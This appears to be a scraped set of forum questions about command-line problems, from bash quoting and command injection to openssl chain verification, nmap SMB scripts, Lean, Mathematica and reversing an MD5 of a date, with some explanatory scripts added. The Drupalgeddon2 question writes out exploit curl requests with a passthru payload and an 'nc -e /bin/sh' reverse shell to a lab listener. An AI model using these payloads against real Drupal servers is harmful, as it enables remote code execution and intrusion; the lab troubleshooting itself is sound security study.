Is this bash command vulnerable to code injection?

I’m wondering if the following code is vulnerable to command injection in bash:

sumo /bin/netflash -Uk $CONTROLED_OPTION 2>&1

I’m thinking that since it’s not enclosed in " " it should be vulnerable, but I’m not sure since I can’t make the command injection work. I tried $() `` | && || but nothing is working.

Or do I need the command to be inside an eval to be vulnerable?

Thanks
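
Added example, not part of the original post: how the shell treats an unquoted expansion like the one above, compared with the quoted and eval forms. fake_netflash is a hypothetical stand-in for /bin/netflash that only reports the arguments it receives, and the input values are constructed.

```sh
#!/bin/sh
# Hypothetical stand-in for /bin/netflash: prints argument count and each argument.
fake_netflash() {
    printf '%s:' "$#"
    for a in "$@"; do printf '[%s]' "$a"; done
    echo
}

# As in the post: unquoted expansion. The value is split on whitespace (and
# glob-expanded), but ; | && $() inside it are NOT re-parsed as shell syntax.
# Extra words still reach the program as extra arguments (option injection).
run_unquoted() { opt=$1; fake_netflash -Uk $opt 2>&1; }

# Quoted expansion: the whole value is always exactly one argument.
run_quoted() { opt=$1; fake_netflash -Uk "$opt" 2>&1; }

# eval re-parses the expanded text as shell code: this is the injectable form.
run_eval() { opt=$1; eval "fake_netflash -Uk $opt" 2>&1; }

# Constructed values standing in for the controlled option.
for value in 'x; echo INJECTED' '$(echo INJECTED)' 'x --extra-option'; do
    printf 'value:    %s\n' "$value"
    printf 'unquoted: %s\n' "$(run_unquoted "$value")"
    printf 'quoted:   %s\n' "$(run_quoted "$value")"
    printf 'eval:     %s\n' "$(run_eval "$value")"
done
```

Only the eval form runs the embedded command; the unquoted form still lets the value add arguments the caller did not intend, which quoting prevents.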

Sending a reverse shell command through the drupalgeddon vulnerability isn’t working

I’m trying to use the Drupalgeddon2 exploit (https://gist.github.com/g0tmi1k/7476eec3f32278adc07039c3e5473708) on a Drupal 7.57 Ubuntu machine.

The requests:

- curl -k -s 'http://192.168.204.141/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=whoami' \
  --data "form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail new Password" | grep form_build_id .
- curl -k -i "http://192.168.204.141/?q=file/ajax/name/%23value/${form_build_id}" \
  --data "form_build_id=${form_build_id}".

execute, along with any other command (ls, cd…), and print a result.

But when I send the curl request:

curl -k -s 'http://192.168.204.141/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=nc-e/bin/sh 192.168.204.128 5555'--data "form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail new Password" | grep form_build_id . 

It doesn’t print anything (form_build_id), not even an error, and the target doesn’t connect to the handler. Where do you think the problem is?

I have tried other payloads, and they result in the same things.

nmap doesn’t run script command?

When I run the command as:

nmap --script=smb-enum-shares.nse 192.168.253.18 

the output:

Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-01 15:18 +03
Nmap scan report for 192.168.253.18
Host is up (0.041s latency).
Not shown: 983 filtered ports
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49167/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 57.47 seconds

Nmap doesn’t show the shared directories. What am I doing wrong?

verification of certificate chain using openssl verify command

When attempting to verify Google’s server certificate chain using openssl, I am getting an error.

Extract Google’s server and intermediate certificates:

$ echo | openssl s_client -showcerts -connect www.google.com:443 | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > /tmp/server_certs.crt

Extract Google’s root CA from the JDK:

$ pwd

/cygdrive/c/Program Files/Java/jdk1.8.0_231/jre/lib/security

$ keytool -export -keystore cacerts -storepass changeit -alias 'globalsignr2ca [jdk]' -file /cygwin64/tmp/google_root.der

$ openssl x509 -in /tmp/google_root.der -out /tmp/google_root.pem -inform der

Also extracted Google’s root certificate from the Chrome browser to /tmp/google-chrome-root.pem. Doing a diff between Chrome’s root certificate and the JDK-extracted root certificate, there is no difference:

$ diff /tmp/google_root.pem /tmp/google-chrome-root.pem

$

Based on this, I know I am using the right root certificate.

Invoke openssl verify

$ openssl verify -CAfile /tmp/google_root.pem /tmp/server_certs.crt

C = US, ST = California, L = Mountain View, O = Google LLC, CN = www.google.com

error 20 at 0 depth lookup: unable to get local issuer certificate
error /tmp/server_certs.crt: verification failed

I know verification through

$ openssl s_client -showcerts -servername www.google.com -connect www.google.com:443

is successful

CONNECTED(00000005)
depth=2 OU = GlobalSign Root CA - R2, O = GlobalSign, CN = GlobalSign
verify return:1
depth=1 C = US, O = Google Trust Services, CN = GTS CA 1O1
verify return:1
depth=0 C = US, ST = California, L = Mountain View, O = Google LLC, CN = www.google.com
verify return:1

and was expecting a similar successful result through the openssl verify command as well.

I am doing this exercise on Windows 10 and Cygwin.
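
Added example, not part of the original post: openssl verify treats only the first certificate in the file it is given as the certificate to check and does not use later certificates in that file as intermediates; those have to be supplied with -untrusted. The script builds a constructed, offline three-level test PKI (all names are made up) and compares the two invocations.

```sh
#!/bin/sh
# Constructed three-level test PKI (root -> intermediate -> leaf); all names
# are made up for this example and nothing contacts a real server.

# mkcert NAME SUBJECT ISSUER|self EXTFILE : writes NAME.key and NAME.pem
mkcert() {
    openssl req -new -newkey rsa:2048 -nodes -keyout "$1.key" \
        -out "$1.csr" -subj "$2" 2>/dev/null || return 1
    if [ "$3" = self ]; then
        openssl x509 -req -in "$1.csr" -signkey "$1.key" \
            -extfile "$4" -days 2 -out "$1.pem" 2>/dev/null
    else
        openssl x509 -req -in "$1.csr" -CA "$3.pem" -CAkey "$3.key" \
            -CAcreateserial -extfile "$4" -days 2 -out "$1.pem" 2>/dev/null
    fi
}

# Prints two words: the result of the invocation from the post, then the
# result with the bundle also supplied as untrusted chain-building material.
compare_verify() {
    dir=$(mktemp -d) || return 1
    (
        cd "$dir" || exit 1
        printf 'basicConstraints=critical,CA:TRUE\n' > ca.ext
        printf 'basicConstraints=CA:FALSE\n' > leaf.ext
        mkcert root '/CN=Constructed Test Root' self ca.ext || exit 1
        mkcert int '/CN=Constructed Test Intermediate' root ca.ext || exit 1
        mkcert leaf '/CN=www.example.test' int leaf.ext || exit 1
        # Same layout as the s_client -showcerts dump: leaf first, then intermediate.
        cat leaf.pem int.pem > server_certs.crt

        # 1) Only the first certificate in the file is verified; the
        #    intermediate after it is ignored, so the leaf's issuer is missing.
        if openssl verify -CAfile root.pem server_certs.crt >/dev/null 2>&1
        then plain=ok; else plain=fail; fi
        # 2) -untrusted makes the bundled intermediate available for path building.
        if openssl verify -CAfile root.pem -untrusted server_certs.crt \
            server_certs.crt >/dev/null 2>&1
        then chained=ok; else chained=fail; fi
        echo "$plain $chained"
    )
    rc=$?
    rm -rf "$dir"
    return $rc
}

compare_verify   # prints: fail ok
```

Certificates passed with -untrusted are used only to build the path; trust still comes solely from the root given with -CAfile.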

How in command “Reformat Code” of PhpStorm use only spaces?

Hello,
In my Vue page, with PhpStorm 2019.2.3 and ESLint in use,
running the "Reformat Code" command I got an error in my app:

./src/views/About.vue
Module Error (from ./node_modules/eslint-loader/index.js):
error: Mixed spaces and tabs (no-mixed-spaces-and-tabs) at src/views/About.vue:177:2:

Looks like this command uses the tab symbol for indent spaces, and I did not find how to make the "Reformat Code" command
use only spaces.
I found these options:
https://imgur.com/

But I do not see any option…


How to apply command to all elements of a list?

So I generated a list of cities and I want to apply FindGeoLocation to all of them without having to separate the elements and then applying.

y = CityData[{Large, Last[x]}]

(x here is dynamically updated from

x = RandomChoice[CountryData[]])

TextString@y

Gives me a list of the Cities.

But now I want to take the list and have FindGeoLocation evaluate it at all the given cities in the list.

As far as I know, Map does that with functions. I don’t know what to do next.

Using Lean Theorem Prover from command line [closed]

I have read this link about using Lean: https://leanprover.github.io/reference/using_lean.html and am able to use Lean with VSCode, but I still have questions about using Lean from the command line.
1. When I download the lean binaries, there is a lean and leanchecker binary. What does each one do, and is there any documentation on using them?
2. What is LEAN_PATH? I wrote a Lean file that uses the Lean library list type. I want this to be checked from the command-line, that is when I write a #check command in the file, on VSCode the #check is underlined in blue letting me know that it checks; I want to do the equivalent from the command-line. But when I run the Lean binary on my file, it says ‘error: file ‘data/list’ not found in the LEAN_PATH’. Now, I have the entire Lean repository (https://github.com/leanprover/lean) in my system and it also contains the built binaries – this is what it took to get Lean to work on VSCode (that and telling VSCode where the head of the repository is). Also, the head of this repository is in my PATH but what does it mean for data/list to be in my LEAN_PATH?

I’m not able to find documentation for these specifics, most of them talk about using Lean from VSCode or Emacs. If I missed it, please point me to the right resource. Thanks!

Finding original command result from MD5 hash

Basically I hashed the result of the “date” command with md5sum:

$ date | md5sum

The output is indeed in the likes of:

e4c94362cd4fd71ec6aca78c7411bdc3 -

My question was: is it possible to recover the result of the date command knowing the date pattern (except for maybe the minutes and seconds)?

I tried using john’s mask option as well as a custom wordlist, without result.

Do you guys have any idea how we could pull that off?
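
Added example, not part of the original post: with the output format of date known, the candidate space is one string per second, which is small enough to enumerate directly. The sketch assumes GNU date (for -d @EPOCH), UTC and the same locale as the original run, and it hashes each candidate together with the trailing newline that date prints, since that newline was part of what md5sum saw; the epoch values are constructed.

```sh
#!/bin/sh
# recover_date TARGET_MD5 START_EPOCH END_EPOCH
# Prints the `date` line whose md5sum equals TARGET_MD5; returns 1 if the
# range holds no match, 2 if `date` cannot format an epoch value.
recover_date() {
    ts=$2
    while [ "$ts" -le "$3" ]; do
        line=$(date -u -d "@$ts") || return 2
        # `date | md5sum` hashes the line plus its trailing newline.
        digest=$(printf '%s\n' "$line" | md5sum | cut -d' ' -f1)
        if [ "$digest" = "$1" ]; then
            printf '%s\n' "$line"
            return 0
        fi
        ts=$((ts + 1))
    done
    return 1
}

# Constructed demo: hash a known instant, then find it again in a 5-minute window.
known=$(date -u -d @1583064000)
target=$(printf '%s\n' "$known" | md5sum | cut -d' ' -f1)
recover_date "$target" 1583063850 1583064150
```

A full day is 86400 candidates, so the hash of a timestamp offers no real secrecy once the approximate time and format are known.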